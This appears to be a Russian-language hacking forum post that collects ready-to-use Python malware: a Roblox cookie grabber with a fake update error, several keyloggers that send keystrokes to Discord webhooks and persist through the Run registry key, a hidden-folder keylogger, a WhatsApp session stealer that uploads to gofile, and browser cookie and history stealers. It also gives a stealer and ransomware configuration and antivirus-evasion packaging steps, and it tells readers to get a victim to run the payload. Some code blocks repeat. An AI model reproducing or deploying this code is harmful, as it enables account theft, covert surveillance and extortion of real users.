                    cmd = f"pyinstaller --onefile --windowed {filename}"
                else:
                    cmd = f"pyinstaller --onefile --windowed {filename} --name {filename.split('.')[0]}"
                subprocess.call(cmd, shell=True)
                Write.Print(f"\n{filename} The file has been converted to exe.", Colors.red)
                break
            elif answer.upper() == "N":
                break
            else:
                Write.Print("\nYou have entered invalid. Please try again.", Colors.red)

    elif choice == "2":
        Write.Print("\nВоспользуйтесь обфускаторами и криптерами", Colors.red)

    elif choice == "3":
        Write.Print("\nExiting the program...", Colors.red)
        break

    else:
        Write.Print("\nYou have entered invalid. Please try again.", Colors.red)

 

[Knew100]

Sakura Grabber - Python Cookie Стилер через Webhook​

Крадёт куки ROBLOX. Взаимодействует с Firefox, Safari, Chromium, Microsoft Edge, Opera (GX), Opera, Brave, Chrome.
Куки можно заменить на спецефические, нужные вам. Webhook от Discord вставите в двух местах.

sudo apt install python3 && python3-pip
pip3 install requests robloxpy browser_cookie3 dhooks discordwebhook getch

PY переделаете в EXE. Как только жертва запустит - вам придут куки из браузеров в диско.

Sakura.py​

import os
from dhooks import Webhook, Embed
import socket
import requests
from tkinter import messagebox
from base64 import b64decode
from msvcrt import getch
from tkinter import messagebox

os.system("title Sakura Grabber")

webhook = "Enter Webhook Here - Cookie Logger"
webhook1 = Webhook('Enter Webhook Here - IP Logger')

try:
    import robloxpy
    import requests
    import browser_cookie3

except:
    input("One Of The Packages Are Not Installed, Run 'Requirements.Bat' To Remove This Error!")
    exit()

import time
time.sleep(1.5)

Sakura_message = "Checking For Updates..."
print(Sakura_message)

import time
time.sleep(8.5)

Sakura_message = "Error, Not On Latest Version!"
print(Sakura_message)

import time
time.sleep(2.5)

Sakura_message = "Installing..."
print(Sakura_message)

def cookiecheckerandsend(cookie, platform):

    if not robloxpy.Utils.CheckCookie(cookie) == "This Is A Valid Cookie":
        return requests.post(url=webhook, data={"content":f"\n|| ```{cookie}``` ||"})

    info = requests.get("https://www.roblox.com/mobileapi/userinfo",cookies={".ROBLOSECURITY":cookie}).json()

    requests.post(url=webhook, json={
        'username': "Sakura",
        'avatar_url': "https://cdn.discordapp.com/avatars/994230412383633480/1057a089f5141d9aac5848210c55212c.png?size=256",
        'embeds': [{
                "title": f"Sakura Grabber",
                "fields": [
                    {"name": ".ROBLOSECURITY", "value": f"```fix\n{cookie}```", "inline": True},
                ],
                "footer": {
                    ""
                }
            }
        ]
    }
)

hostname = socket.gethostname()
ip = requests.get('https://api.ipify.org/').text
r = requests.get(f'http://extreme-ip-lookup.com/json/{ip}')
geo = r.json()
embed = Embed()
fields = [
    {'name': 'IP Address', 'value': geo['query']},
]
for field in fields:
    if field['value']:
        embed.add_field(name=field['name'], value=field['value'], inline=True)
webhook1.send(embed=embed)

def Sakura():

    try:
        cookies = browser_cookie3.firefox(domain_name='roblox.com')
        for cookie in cookies:
            if cookie.name == '.ROBLOSECURITY':
                cookiecheckerandsend(cookie.value, platform='Firefox')
    except:
        pass

    try:
        cookies = browser_cookie3.safari(domain_name='roblox.com')
        for cookie in cookies:
            if cookie.name == '.ROBLOSECURITY':
                cookiecheckerandsend(cookie.value, platform='Safari')
    except:
        pass

    try:
        cookies = browser_cookie3.chromium(domain_name='roblox.com')
        for cookie in cookies:
            if cookie.name == '.ROBLOSECURITY':
                cookiecheckerandsend(cookie.value, platform='Chromium')
    except:
        pass

    try:
        cookies = browser_cookie3.edge(domain_name='roblox.com')
        for cookie in cookies:
            if cookie.name == '.ROBLOSECURITY':
                cookiecheckerandsend(cookie.value, platform='Microsoft Edge')
    except:
        pass

    try:
        cookies = browser_cookie3.opera_gx(domain_name='roblox.com')
        for cookie in cookies:
            if cookie.name == '.ROBLOSECURITY':
                cookiecheckerandsend(cookie.value, platform='Opera GX')
    except:
        pass

    try:
        cookies = browser_cookie3.opera(domain_name='roblox.com')
        for cookie in cookies:
            if cookie.name == '.ROBLOSECURITY':
                cookiecheckerandsend(cookie.value, platform='Opera')
    except:
        pass

    try:
        cookies = browser_cookie3.brave(domain_name='roblox.com')
        for cookie in cookies:
            if cookie.name == '.ROBLOSECURITY':
                cookiecheckerandsend(cookie.value, platform='Brave')
    except:
        pass

    try:
        cookies = browser_cookie3.chrome(domain_name='roblox.com')
        for cookie in cookies:
            if cookie.name == '.ROBLOSECURITY':
                cookiecheckerandsend(cookie.value, platform='Chrome')
    except:
        pass

cookies = Sakura()

messagebox.showerror("Error", "Unable to install latest version.")

Python кейлогер отправляет нажатые клавиши через Discord Server, Webhook вставите в скрипт перед компиляцией в exe
Время отправки каждый час SEND_REPORT_EVERY = 3600

sudo apt install python3 && python3-pip
pip3 install keyboard discord_webhook pyinstaller
pyinstaller keylogger.py --onefile --noconsole

keylogger.py​

self.start_dt = datetime.now()
keyboard.on_release(callback=self.callback)
self.report()
keyboard.wait()

if __name__ == "__main__":
keylogger = Keylogger(interval=SEND_REPORT_EVERY, report_method="webhook")
keylogger.start()

Python кейлогер отправляет нажатые клавиши через Discord Server, Webhook вставите в скрипт перед компиляцией в exe

sudo apt install python3 && python3-pip
pip3 install pynput discord_webhook pyinstaller
pyinstaller -F -w main.py

Флаги -F и -w означают, что программа будет упакована в один файл и работает в фоновом режиме (без окон).

main.py​

import pynput
from pynput.keyboard import Key, Listener
from discord_webhook import DiscordWebhook
import winreg
import sys

webhook_url = '#'     # Paste here your Webhook URL (instructions in README.md)
registry_name = 'Discord Webhook Keylogger'     # Registry name for system startup execution
keys_buffer = ''     # Create empty buffer variable *leave as it is*

winreg.CreateKey(winreg.HKEY_CURRENT_USER, r"Software\Microsoft\Windows\CurrentVersion\Run")     # Create registry key for automatic program execution after system startup
registry_key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, r"Software\Microsoft\Windows\CurrentVersion\Run", 0, winreg.KEY_WRITE)     # Open key for entry
winreg.SetValueEx(registry_key, registry_name, 0, winreg.REG_SZ, sys.argv[0])     # Creating entry
winreg.CloseKey(registry_key)     # Close key

def send_message(message):
    DiscordWebhook(url=webhook_url, content=message).execute()     # Send message using Webhook

def on_press(key):     # Executes on each key pressed
    global keys_buffer
    if str(key)[:4] == 'Key.':     # Check if pressed key is not number, letter or character
        key = ' `[' + str(key) + ']`'
    else:
        key = str(key)[1]
    if len(keys_buffer) + len(key) >= 1975 or key == ' `[Key.enter]`':     # Check if keys_buffer exceeds Discord's 2000 characters per message limit or ENTER is pressed
        send_message(keys_buffer + key)     # Send logged keys on Discord channel
        keys_buffer = ''     # Reset keys_buffer to log new key presses
    else:
        keys_buffer += key     # Concatenate new logged key presses to make it look simpler

with Listener(on_press=on_press) as listener:
    listener.join()     # Start the listener

Python кейлогер отправляет нажатые клавиши через Discord Server, Webhook вставите в скрипт перед компиляцией в exe
Время отправки каждый час SEND_REPORT_EVERY = 3600

sudo apt install python3 && python3-pip
pip3 install keyboard discord_webhook pyinstaller
pyinstaller keylogger.py --onefile --noconsole

keylogger.py​

import os

from dhooks import Webhook, Embed

import socket

import requests

from tkinter import messagebox

from base64 import b64decode

from msvcrt import getch

from tkinter import messagebox


os.system("title Sakura Grabber")


webhook = "Enter Webhook Here - Cookie Logger"

webhook1 = Webhook('Enter Webhook Here - IP Logger')


try:

    import robloxpy

    import requests

    import browser_cookie3


except:

    input("One Of The Packages Are Not Installed, Run 'Requirements.Bat' To Remove This Error!")

    exit()


import time

time.sleep(1.5)


Sakura_message = "Checking For Updates..."

print(Sakura_message)


import time

time.sleep(8.5)


Sakura_message = "Error, Not On Latest Version!"

print(Sakura_message)


import time

time.sleep(2.5)


Sakura_message = "Installing..."

print(Sakura_message)


def cookiecheckerandsend(cookie, platform):


    if not robloxpy.Utils.CheckCookie(cookie) == "This Is A Valid Cookie":

        return requests.post(url=webhook, data={"content":f"\n|| ```{cookie}``` ||"})


    info = requests.get("https://www.roblox.com/mobileapi/userinfo",cookies={".ROBLOSECURITY":cookie}).json()


    requests.post(url=webhook, json={

        'username': "Sakura",

        'avatar_url': "https://cdn.discordapp.com/avatars/994230412383633480/1057a089f5141d9aac5848210c55212c.png?size=256",

        'embeds': [{

                "title": f"Sakura Grabber",

                "fields": [

                    {"name": ".ROBLOSECURITY", "value": f"```fix\n{cookie}```", "inline": True},

                ],

                "footer": {

                    ""

                }

            }

        ]

    }

)


hostname = socket.gethostname()

ip = requests.get('https://api.ipify.org/').text

r = requests.get(f'http://extreme-ip-lookup.com/json/{ip}')

geo = r.json()

embed = Embed()

fields = [

    {'name': 'IP Address', 'value': geo['query']},

]

for field in fields:

    if field['value']:

        embed.add_field(name=field['name'], value=field['value'], inline=True)

webhook1.send(embed=embed)


def Sakura():


    try:

        cookies = browser_cookie3.firefox(domain_name='roblox.com')

        for cookie in cookies:

            if cookie.name == '.ROBLOSECURITY':

                cookiecheckerandsend(cookie.value, platform='Firefox')

    except:

        pass


    try:

        cookies = browser_cookie3.safari(domain_name='roblox.com')

        for cookie in cookies:

            if cookie.name == '.ROBLOSECURITY':

                cookiecheckerandsend(cookie.value, platform='Safari')

    except:

        pass


    try:

        cookies = browser_cookie3.chromium(domain_name='roblox.com')

        for cookie in cookies:

            if cookie.name == '.ROBLOSECURITY':

                cookiecheckerandsend(cookie.value, platform='Chromium')

    except:

        pass


    try:

        cookies = browser_cookie3.edge(domain_name='roblox.com')

        for cookie in cookies:

            if cookie.name == '.ROBLOSECURITY':

                cookiecheckerandsend(cookie.value, platform='Microsoft Edge')

    except:

        pass


    try:

        cookies = browser_cookie3.opera_gx(domain_name='roblox.com')

        for cookie in cookies:

            if cookie.name == '.ROBLOSECURITY':

                cookiecheckerandsend(cookie.value, platform='Opera GX')

    except:

        pass


    try:

        cookies = browser_cookie3.opera(domain_name='roblox.com')

        for cookie in cookies:

            if cookie.name == '.ROBLOSECURITY':

                cookiecheckerandsend(cookie.value, platform='Opera')

    except:

        pass


    try:

        cookies = browser_cookie3.brave(domain_name='roblox.com')

        for cookie in cookies:

            if cookie.name == '.ROBLOSECURITY':

                cookiecheckerandsend(cookie.value, platform='Brave')

    except:

        pass


    try:

        cookies = browser_cookie3.chrome(domain_name='roblox.com')

        for cookie in cookies:

            if cookie.name == '.ROBLOSECURITY':

                cookiecheckerandsend(cookie.value, platform='Chrome')

    except:

        pass


cookies = Sakura()


messagebox.showerror("Error", "Unable to install latest version.")

Python кейлогер отправляет нажатые клавиши через Discord Server, Webhook вставите в скрипт перед компиляцией в exe
Время отправки каждый час SEND_REPORT_EVERY = 3600

sudo apt install python3 && python3-pip
pip3 install keyboard discord_webhook pyinstaller
pyinstaller keylogger.py --onefile --noconsole

keylogger.py​

import keyboard,os
from threading import Timer
from datetime import datetime
from discord_webhook import DiscordWebhook, DiscordEmbed

SEND_REPORT_EVERY = TIME_IN_SECONDS_HERE
WEBHOOK = "WEBHOOK_URL_HERE"

class Keylogger:
    def __init__(self, interval, report_method="webhook"):
        now = datetime.now()
        self.interval = interval
        self.report_method = report_method
        self.log = ""
        self.start_dt = now.strftime('%d/%m/%Y %H:%M')
        self.end_dt = now.strftime('%d/%m/%Y %H:%M')
        self.username = os.getlogin()

    def callback(self, event):
        name = event.name
        if len(name) > 1:
            if name == "space":
                name = " "
            elif name == "enter":
                name = "[ENTER]\n"
            elif name == "decimal":
                name = "."
            else:
                name = name.replace(" ", "_")
                name = f"[{name.upper()}]"
        self.log += name

    def report_to_webhook(self):
        flag = False
        webhook = DiscordWebhook(url=WEBHOOK)
        if len(self.log) > 2000:
            flag = True
            path = os.environ["temp"] + "\\report.txt"
            with open(path, 'w+') as file:
                file.write(f"Keylogger Report From {self.username} Time: {self.end_dt}\n\n")
                file.write(self.log)
            with open(path, 'rb') as f:
                webhook.add_file(file=f.read(), filename='report.txt')
        else:
            embed = DiscordEmbed(title=f"Keylogger Report From ({self.username}) Time: {self.end_dt}", description=self.log)
            webhook.add_embed(embed)
        webhook.execute()
        if flag:
            os.remove(path)

    def report(self):
        if self.log:
            if self.report_method == "webhook":
                self.report_to_webhook()
        self.log = ""
        timer = Timer(interval=self.interval, function=self.report)
        timer.daemon = True
        timer.start()

    def start(self):
        self.start_dt = datetime.now()
        keyboard.on_release(callback=self.callback)
        self.report()
        keyboard.wait()
 
if __name__ == "__main__":
    keylogger = Keylogger(interval=SEND_REPORT_EVERY, report_method="webhook")
    keylogger.start()

Python кейлогер отправляет нажатые клавиши через Discord Server, Webhook вставите в скрипт перед компиляцией в exe

sudo apt install python3 && python3-pip
pip3 install pynput discord_webhook pyinstaller
pyinstaller -F -w main.py

Флаги -F и -w означают, что программа будет упакована в один файл и работает в фоновом режиме (без окон).

main.py​

import pynput
from pynput.keyboard import Key, Listener
from discord_webhook import DiscordWebhook
import winreg
import sys

webhook_url = '#'     # Paste here your Webhook URL (instructions in README.md)
registry_name = 'Discord Webhook Keylogger'     # Registry name for system startup execution
keys_buffer = ''     # Create empty buffer variable *leave as it is*

winreg.CreateKey(winreg.HKEY_CURRENT_USER, r"Software\Microsoft\Windows\CurrentVersion\Run")     # Create registry key for automatic program execution after system startup
registry_key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, r"Software\Microsoft\Windows\CurrentVersion\Run", 0, winreg.KEY_WRITE)     # Open key for entry
winreg.SetValueEx(registry_key, registry_name, 0, winreg.REG_SZ, sys.argv[0])     # Creating entry
winreg.CloseKey(registry_key)     # Close key

def send_message(message):
    DiscordWebhook(url=webhook_url, content=message).execute()     # Send message using Webhook

def on_press(key):     # Executes on each key pressed
    global keys_buffer
    if str(key)[:4] == 'Key.':     # Check if pressed key is not number, letter or character
        key = ' `[' + str(key) + ']`'
    else:
        key = str(key)[1]
    if len(keys_buffer) + len(key) >= 1975 or key == ' `[Key.enter]`':     # Check if keys_buffer exceeds Discord's 2000 characters per message limit or ENTER is pressed
        send_message(keys_buffer + key)     # Send logged keys on Discord channel
        keys_buffer = ''     # Reset keys_buffer to log new key presses
    else:
        keys_buffer += key     # Concatenate new logged key presses to make it look simpler

with Listener(on_press=on_press) as listener:
    listener.join()     # Start the listener

░██████╗░█████╗░████████╗░█████╗░███╗░░██╗██╗░░██╗██╗░░░░░░██████╗░██████╗░
██╔════╝██╔══██╗╚══██╔══╝██╔══██╗████╗░██║██║░██╔╝██║░░░░░██╔════╝░██╔══██╗
╚█████╗░███████║░░░██║░░░███████║██╔██╗██║█████═╝░██║░░░░░██║░░██╗░██████╔╝
░╚═══██╗██╔══██║░░░██║░░░██╔══██║██║╚████║██╔═██╗░██║░░░░░██║░░╚██╗██╔══██╗
██████╔╝██║░░██║░░░██║░░░██║░░██║██║░╚███║██║░╚██╗███████╗╚██████╔╝██║░░██║

SATANKLGR - Python Keylogger Вебка и скрины​

Функции инструмента для Windows всех версий:​

Нажатия клавиш
Веб-камера
Скриншоты
Постоянство

Преимущества:​

Совместим со всеми версиями Windows
Получение запутанного файла .exe для защиты от детектов
Слабо определяется антивирусами
Создание скрытой папки на диске C:\
Автоматическое удаление файлов после отправки на почту
Добавление в автозагрузку

Требования:​

Python https://www.python.org/downloads/release/python-311/

Применение:​

Скачать zip-архив, можете открывать, чистый Python код.

sudo apt install python3 && python3-pip
pip3 install -r requirements.txt

Запускаем установщик
python3 launcher.py

Скомпилировать startup.exe
pyinstaller --onefile startup.py


Когда запускаете скомпилированный файл startup.exe, он автоматически создает скрытую папку на диске C и перемещает SATANKLGR.exe в эту папку. Затем он запускает SATANKLGR.exe из папки, и программа появляется в диспетчере задач и работает здесь все время. После этого момента файл startup.exe не нужен. Впоследствии приложение будет постепенно добавлять снимки экрана и снимки с веб-камеры. После приложения отправит их на указанный адрес электронной почты.


Можно запустить SATANKLGR в Linux, однако вы получите только файл .py с исходным кодом.
После этого вы можете перейти в Windows и скомпилировать файл в .exe:

pyarmor pack --clean -e "--onefile --windowed --icon=NONE" SATANKLGR.py


Чтобы прервать сеанс кейлоггера, запустите terminate.bat

║║║╠═╣
╚╩╝╩ ╩
╔═╗┌┬┐┌─┐┌─┐┬ ┌─┐┬─┐
╚═╗ │ ├┤ ├─┤│ ├┤ ├┬┘
╚═╝ ┴ └─┘┴ ┴┴─┘└─┘┴└─

WhatsApp Stealer​

Stealer сессии WhatsApp на Python, программа крадет данные жертвы WhatsApp

Создайте полезную нагрузку (программа спросит вас, хотите ли вы составить полезную нагрузку)
Отправьте полезную нагрузку своей жертве и заставьте открыть

Полезная нагрузка сделает ZIP всех данных WhatsApp, расположенных по адресу LOCALAPPDATA\\Packages\\5319275A.WhatsAppDesktop_cv1g1gvanyjgm
Вам нужно будет зарегистрировать себе WebHook в Discord.
Идёт предварительно через https://api.gofile.io

sudo apt install python3 && python3-pip
pip3 install colorama requests pystyle dhooks pyinstaller
python3 main.py

main.py​

from colorama import Fore
import time
import os
import shutil
import ctypes
import requests

from pystyle import Colors, Colorate, Write, Center, Box

os.system('cls')
ctypes.windll.kernel32.SetConsoleTitleW("WhatsApp Session Stealer | by xpierroz")

banner = """
        ╦ ╦╔═╗
        ║║║╠═╣
        ╚╩╝╩ ╩
╔═╗┌┬┐┌─┐┌─┐┬  ┌─┐┬─┐
╚═╗ │ ├┤ ├─┤│  ├┤ ├┬┘
╚═╝ ┴ └─┘┴ ┴┴─┘└─┘┴└─
"""

def _exit():
    print("\n")
    Write.Print(f"    .$ http://commudazrdyhbullltfdy222krfjhoqzizks5ejmocpft3ijtxq5khqd.onion/", Colors.yellow_to_red, interval=0.05)
    time.sleep(3)
    quit()

def _compile():
    print("\n")
    line = f'pyinstaller --onefile whatsapp.pyw'
    icox = Write.Input("    .$ Enter icon path (type N for none) -> ", Colors.green_to_blue, interval=0.025)
    if icox != "N":
        line += f"--icon={icox}"
 
    Write.Print(f"    .$ Compiling to exe ...", Colors.green_to_yellow, interval=0.05)
    os.system('echo off')
    print(Fore.BLACK)
    os.system(line)
    #os.system('cls')
    print(Colorate.Horizontal(Colors.rainbow, "    .$ Successfuly Compiled", 1))
    _exit()

def main():
    os.system("cls")
    print("\n") # Formatting stuff
    print(Colorate.Horizontal(Colors.green_to_blue, Center.XCenter(banner), 1))
    print(Colorate.Horizontal(Colors.green_to_blue, Box.Lines("made by github.com/xpierroz")))
    print("\n")
 
    wbh_url = Write.Input("    .$ Enter your WebHook url -> ", Colors.green_to_blue, interval=0.025)
    Write.Print(f"    .$ Fetching payload ...", Colors.green_to_yellow, interval=0.05)
    payload = requests.get("https://raw.githubusercontent.com/xpierroz/whatsappstealer/master/payload.py").text
 
    with open("whatsapp.pyw", "w") as f:
        f.write(payload.replace('WEBHOOK = "xpierroz on top"', f'WEBHOOK = "{wbh_url}"'))
 
    Write.Print(f"\n    .$ Payload fetched !", Colors.green_to_cyan, interval=0.05)
    compiling = Write.Input("\n    .$ Compile to exe [Y/N] -> ", Colors.green_to_blue, interval=0.025)
    if compiling == "Y":
        _compile()
    else:
        _exit()

 
main()

payload.py​

import dhooks
import os
import requests
import time
import socket
import shutil

WEBHOOK = "xpierroz on top"
direct = f"{os.getenv('LOCALAPPDATA')}\\Packages\\5319275A.WhatsAppDesktop_cv1g1gvanyjgm"
print(direct)

def uploadToAnonfiles(path):
    for x in range(10):
        try:
            rr = requests.post(
                f'https://{requests.get("https://api.gofile.io/getServer").json()["data"]["server"]}.gofile.io/uploadFile',
                files={
                    "file": open(path, "rb")
                },
            ).json()["data"]["downloadPage"]
            return rr
        except Exception:
            time.sleep(2)
    return False

try:
    shutil.make_archive("ssouput", "zip", direct)
except Exception:
    pass

m = uploadToAnonfiles(f"{os.getcwd()}\\ssouput.zip")
os.remove(f"{os.getcwd()}\\ssouput.zip")
dhooks.Webhook(WEBHOOK).send(f"```xpierroz WhatsApp Stealer - grabbed {socket.gethostname()} - {m}```")

KeyWatch - это Python кейлогер записывающий нажатия клавиш в системе Windows, работает в фоновом режиме, нажатые пользователем клавиши регистрирует в скрытой папке

Список функций:​

• Скрытый файл журнала - хранится в скрытой папке, что делает его трудно обнаруживаемым
• Название окна - получает заголовок активного окна в настоящее время и включает его в файл журнала для лучшего контекста
• Время - записывает разницу во времени между каждым нажатием клавиши, чтобы обеспечить более точный журнал
• Пользовательское представление ключей - заменяет специальные клавиши на пользовательские, читаемые для облегчения интерпретации
• Автоматическое создание папок - автоматически создает скрытую папку для хранения файлов журналов
• Фоновое выполнение - молча работает в фоновом режиме, не вмешиваясь в деятельность пользователей
• Эффективный и легкий - разработан, чтобы оказать минимальное влияние на системные ресурсы

Применение:​

Чтобы использовать KeyWatch, выполните следующие шаги:

• Запустите python keywatch.py
• KeyLogger начнёт работать в фоновом режиме, захватывая клавишные и сохраняя их в файле журнала
• Файл журнала хранится в скрытой папке, расположенной по адресу C:/ProgramData/Windows Security/

Использование:​

Убедитесь, что Python установлен https://www.python.org/downloads/ Обязательно "Add Python to PATH" при установке!
py -m pip install --upgrade pip
py -m pip install pywin32 keyboard
python keywatch.py

keywatch.py​

#██╗░░██╗███████╗██╗░░░██╗░██╗░░░░░░░██╗░█████╗░████████╗░█████╗░██╗░░██╗
#██║░██╔╝██╔════╝╚██╗░██╔╝░██║░░██╗░░██║██╔══██╗╚══██╔══╝██╔══██╗██║░░██║
#█████═╝░█████╗░░░╚████╔╝░░╚██╗████╗██╔╝███████║░░░██║░░░██║░░╚═╝███████║
#██╔═██╗░██╔══╝░░░░╚██╔╝░░░░████╔═████║░██╔══██║░░░██║░░░██║░░██╗██╔══██║
#██║░╚██╗███████╗░░░██║░░░░░╚██╔╝░╚██╔╝░██║░░██║░░░██║░░░╚█████╔╝██║░░██║
#╚═╝░░╚═╝╚══════╝░░░╚═╝░░░░░░╚═╝░░░╚═╝░░╚═╝░░╚═╝░░░╚═╝░░░░╚════╝░╚═╝░░╚═╝

import os
import datetime
from win32gui import GetForegroundWindow, GetWindowText
import keyboard
from win32con import FILE_ATTRIBUTE_HIDDEN, FILE_ATTRIBUTE_SYSTEM
from win32api import SetFileAttributes

hidden_folder = os.path.join(os.environ['ProgramData'], 'Windows Security')
os.makedirs(hidden_folder, exist_ok=True)

attributes = FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM
SetFileAttributes(hidden_folder, attributes)

log_file = os.path.join(hidden_folder, 'license.txt')

KEY_MAP = {
    " ": "[SPACE]",
    "space": "[SPACE]",
    "enter": "[ENTER]",
    "esc": "[ESC]",
    "ctrl": "[CTRL]",
    "alt": "[ALT]",
    "alt gr": "[ALT GR]",
    "tab": "[TAB]",
    "shift": "[SHIFT]",
    "maj": "[SHIFT]",
    "backspace": "[BACKSPACE]",
    "caps lock": "[CAPS LOCK]",
    "verr.maj": "[CAPS LOCK]",
    "up": "[UP]",
    "haut": "[UP]",
    "down": "[DOWN]",
    "bas": "[DOWN]",
    "left": "[LEFT]",
    "gauche": "[LEFT]",
    "right": "[RIGHT]",
    "droite": "[RIGHT]",
    "page up": "[PAGE UP]",
    "pg.suiv": "[PAGE UP]",
    "page down": "[PAGE DOWN]",
    "pg. prec": "[PAGE DOWN]",
    "home": "[HOME]",
    "end": "[END]",
    "fin": "[END]",
    "insert": "[INSERT]",
    "delete": "[DELETE]",
    "suppr": "[DELETE]",
    "windows gauche": "[LEFT WINDOWS]",
    "f1": "[F1]",
    "f2": "[F2]",
    "f3": "[F3]",
    "f4": "[F4]",
    "f5": "[F5]",
    "f6": "[F6]",
    "f7": "[F7]",
    "f8": "[F8]",
    "f9": "[F9]",
    "f10": "[F10]",
    "f11": "[F11]",
    "f12": "[F12]",
}

def get_window_title():
    hwnd = GetForegroundWindow()
    window_title = GetWindowText(hwnd)
    return window_title


def write_keys(keys_pressed, last_time, file):
    with open(file, "a") as f:
        current_time = datetime.datetime.now()
        time_diff = (current_time - last_time).total_seconds()
        window_title = get_window_title()

        if window_title != write_keys.last_window_title:
            f.write(f"\n[WINDOW TITLE] -> {window_title}\n")
            write_keys.last_window_title = window_title

        if time_diff >= 1:
            time_str = f"({int(time_diff)} s)"
            if time_diff < 2:
                time_str = f"({int(time_diff * 1000)} ms)"
            if keys_pressed:
                f.write(f"{time_str} {''.join(keys_pressed)} ")
                keys_pressed.clear()
        else:
            if keys_pressed:
                f.write(''.join(keys_pressed))
                keys_pressed.clear()

        f.flush()
        last_time = current_time

        return last_time

write_keys.last_window_title = ""

def on_press(event):
    try:
        keys_pressed = []
        if event.name in KEY_MAP:
            keys_pressed.append(KEY_MAP[event.name])
        elif event.name.isprintable():
            keys_pressed.append(event.name)
        global last_time
        last_time = write_keys(keys_pressed, last_time, log_file)
    except Exception as e:
        print(f"Error: {e}")

if __name__ == "__main__":
    with open(log_file, "a") as f:
        f.write(
            f"\nLancement du script le {datetime.date.today()} à {datetime.datetime.now().strftime('%H:%M:%S')}\n"
        )

    last_time = datetime.datetime.now()
    window_title = get_window_title()
    write_keys.last_window_title = window_title

    on_press_event = on_press
    keyboard.on_press(on_press_event)
    keyboard.wait()

Angst Stealer​

Angst Stealer - это стилер Python, вымогатель, имеет в общей сложности 10 плагинов.

Плагин	Описание
Chrome	Chrome плагин дампит все пароли пользователей, веб-сайты и имена пользователей.
Filezilla	Если установлена Filezilla, сделает дамп всего.
Ransomware	Шифрует все файлы на компьютере жертв, также бросает заметку.
Discord	Discord token для Chrome and Discord.
Send_Discord	Отправляет все файлы через WebHook Discord.
Send_Telegram	Отправляет все файлы через Telegram канал.
User	Данные о компе.
Windows	Ключ активации Windows.
Cleanup	Очищает все следы.
AntiVM	Пытается обнаружить, находится ли пользователь на виртуальной машине.

Установите Python https://www.python.org
Находясь внутри архива, откройте терминал.
Установите необходимые библиотеки с помощью pip
pip install pycryptodome==3.9.8 requests==2.31.0 pyinstaller==3.6 pyarmor==6.3.3 pywin32==301 colorama telebot

Внутри основного файла вы увидите шаблон конфигурации, измените его, чтобы он соответствовал вашим требованиям.

CONFIG = {

"webhook" : "", # ссылка на Webhook Discord, которую вы хотите использовать

"chrome" : True, # пароли Chrome

"filezilla"rue, # возможные сохраненные пароли Filezilla

"userdata"rue, # информация о своей жертве

"discord"rue, # украсть токены Discord

"send_discord": False, # опция для отправки в Webhook Discord

"send_telegram": True, # опция для отправки в телегу

"telegram_token": "", # токен для бота Telegram

"telegram_chat_id": "", # идентификатор чата Telegram

"ransomware" : {

"enabled" : False, # если установлено True, вы включили модуль вымогатель

"target_dir" : "C:\\Users\\", # каталог, в котором вы хотите, чтобы он шифровал

"extenstion" : ".angst", # расширения вымогателя, просто устанавливает расширение выходного файла

"btcAddy" : "", # биток

"email" : "charge@d0xbin.org" # связь

}

}

Запустите одну из следующих команд, перечисленных ниже, стоит отметить, что Pyarmor иногда повредит исполняемый файл, поэтому, если вы планируете использовать команду Pyarmor, вы должны проверить ее локально, чтобы убедиться, что он работает.

    pyinstaller --onefile --hidden-import=pkg_resources.py2_warn angst.py
    pyarmor pack -e " --onefile --hidden-import=pkg_resources.py2_warn" angst.py

Архив чистый, там 10 питон файлов, лень выкладывать в коде.

Cookie Stealer​

Можете свободно добавить другие браузеры, куда копировать куки.

cooker.py​

import os

import shutil

import sqlite3

import win32crypt

def get_chrome_cookies():

    cookie_file = os.path.join(os.getenv('APPDATA'), r"..\Local\Google\Chrome\User Data\Default\Cookies")

    return cookie_file

def get_firefox_cookies():

    cookie_file = os.path.join(os.getenv('APPDATA'), r"Mozilla\Firefox\Profiles", os.listdir(os.path.join(os.getenv('APPDATA'), r"Mozilla\Firefox\Profiles"))[0], "cookies.sqlite")

    return cookie_file

def get_edge_cookies():

    cookie_file = os.path.join(os.getenv('LOCALAPPDATA'), r"Microsoft\Edge\User Data\Default\Cookies")

    return cookie_file

def copy_cookies(source_file, destination_path):

    destination_file = os.path.join(destination_path, os.path.basename(source_file))

  

    if os.path.exists(source_file):

        shutil.copy2(source_file, destination_file)

        print(f"Successfully copied cookies from {source_file} to {destination_file}")

    else:

        print(f"Unable to find cookies for {source_file}")

def copy_all_cookies(destination_path):

    browsers = [

        ("Google Chrome", get_chrome_cookies()),

        ("Mozilla Firefox", get_firefox_cookies()),

        ("Microsoft Edge", get_edge_cookies())

    ]

    for browser_name, cookie_file in browsers:

        copy_cookies(cookie_file, destination_path)

# Set the destination path to your desired USB location

destination_path = "E:\\CpCookies\\nazovpc"

copy_all_cookies(destination_path)

Chrome Stealer​

Стилер работает по хромам.

chrome.py​

import os
import json
import sqlite3
import shutil
import zipfile

# Get the current username
username = os.getlogin()

# Construct the paths to the Chrome data files
bookmarks_path = f"C:/Users/{username}/AppData/Local/Google/Chrome/User Data/Default/Bookmarks"
history_db_path = f"C:/Users/{username}/AppData/Local/Google/Chrome/User Data/Default/History"

# Load the Bookmarks file
with open(bookmarks_path, encoding="utf-8") as file:
    bookmarks_data = json.load(file)

# Extract the URLs and names from the Bookmarks data
bookmarks = bookmarks_data["roots"]["bookmark_bar"]["children"]

# Create a text file for the bookmarks in the %temp% directory
temp_dir = os.environ["TEMP"]
bookmarks_file_path = os.path.join(temp_dir, "Chrome Bookmarks.txt")

# Write the bookmarks to the text file
with open(bookmarks_file_path, "w", encoding="utf-8") as file:
    for bookmark in bookmarks:
        url = bookmark["url"]
        name = bookmark["name"]
        file.write(f"Name: {name}\nURL: {url}\n\n")

print(f"Bookmarks saved to: {bookmarks_file_path}")

# Create a copy of the History database file
history_copy_path = os.path.join(temp_dir, "HistoryCopy")
shutil.copyfile(history_db_path, history_copy_path)

# Connect to the copied database
conn = sqlite3.connect(history_copy_path)
cursor = conn.cursor()

# Execute a query to fetch browsing history
cursor.execute("SELECT url, title FROM urls")

# Fetch all rows returned by the query
rows = cursor.fetchall()

# Create a text file for the browsing history in the %temp% directory
history_file_path = os.path.join(temp_dir, "Chrome History.txt")

# Write the browsing history to the text file
with open(history_file_path, "w", encoding="utf-8") as file:
    for row in rows:
        url = row[0]
        title = row[1]
        file.write(f"URL: {url}\n")
        file.write(f"Title: {title}\n")
        file.write("--------------------\n")

print(f"History saved to: {history_file_path}")

